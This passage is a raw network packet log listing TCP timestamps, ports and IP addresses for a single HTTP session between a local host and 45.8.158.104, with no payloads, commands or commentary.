Oct 13, 2022 09:30:53.734010935 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.734038115 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.734050989 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.734066963 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.734091997 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.734112024 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.734133959 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.734150887 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.734174013 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.734196901 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.734230995 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.826613903 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.826695919 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.826759100 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.826819897 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.826843023 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.826884031 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.826906919 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.826917887 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.826977015 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.826984882 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.827044010 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.827049971 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.827110052 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.827112913 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.827158928 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.827163935 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.827200890 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.827204943 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.827243090 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.827248096 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.827289104 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.827634096 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.827759027 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.828269005 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.828363895 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.828507900 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.828577042 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.828592062 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.828644037 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.828665018 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.828713894 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.828728914 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.828779936 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.828787088 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.828846931 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.828850985 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.828917027 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.828922033 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.828983068 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.828991890 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829051018 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829070091 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829138994 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829149961 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829205990 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829210997 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829273939 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829274893 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829341888 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829343081 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829407930 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829416037 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829474926 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829477072 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829541922 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829543114 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829608917 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829611063 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829677105 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829679966 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829745054 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829746008 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829813004 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829813957 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829879045 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.829884052 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.829950094 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.830312967 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.830398083 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.831373930 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.831486940 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.831617117 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.831660986 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.831691980 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.831728935 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924022913 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924089909 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924150944 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924190998 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924222946 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924231052 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924268961 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924268961 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924273014 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924312115 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924319029 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924340010 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924360991 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924360991 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924393892 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924402952 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924438000 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924444914 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924482107 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924485922 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924523115 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924526930 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924561977 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924566984 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924606085 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924607992 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924643993 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924649954 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924689054 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924694061 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924729109 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924736023 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924772024 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924777031 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924813032 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924817085 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924853086 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924858093 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924895048 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924899101 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924936056 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924938917 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924978971 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924981117 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925018072 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925021887 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925060987 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925064087 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925103903 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925105095 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925141096 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925147057 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925184965 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925189972 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925225019 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925230026 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925266981 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925271988 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925312996 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925316095 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925354004 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925358057 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925396919 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938015938 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938082933 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938117027 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938126087 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938138962 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938160896 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938169003 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938201904 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938210011 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938242912 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938251972 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938285112 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938292980 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938325882 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938335896 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938369036 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938379049 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938415051 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938417912 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938451052 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938458920 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938494921 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938524961 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938563108 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938657999 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938694954 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938771963 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938813925 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938816071 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938849926 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938855886 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938925982 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938939095 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938968897 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938968897 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.939007998 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.939012051 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.939044952 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.980545998 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980614901 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980668068 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980712891 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980753899 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980796099 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980799913 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.980832100 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.980842113 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980882883 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980923891 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980941057 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.980963945 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981018066 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981030941 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981086016 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981128931 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981146097 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981163979 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981168985 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981209040 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981245995 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981246948 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981287003 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981304884 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981326103 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981365919 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981369019 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981415987 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981451035 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.018419027 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.018639088 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.022754908 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.022804022 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.022846937 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.022860050 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.022891998 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.022891998 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.022911072 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.022948027 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.022972107 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.023001909 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.079674006 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.172065973 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414618969 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414688110 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414752007 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414769888 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.414797068 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414834023 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.414834023 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.414840937 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414859056 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.414923906 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414927959 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.414963961 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.415007114 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.415045977 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.415049076 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.415088892 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.415102005 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.415102005 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.415112972 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.415235043 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.415235043 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457063913 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457129955 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457161903 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457195044 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457237959 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457278013 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457319021 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457350016 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457367897 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457391977 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457432032 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457434893 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457454920 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457479000 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457505941 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457514048 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457557917 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457567930 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457600117 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457623959 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457642078 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457674026 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457689047 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457726002 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457772017 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
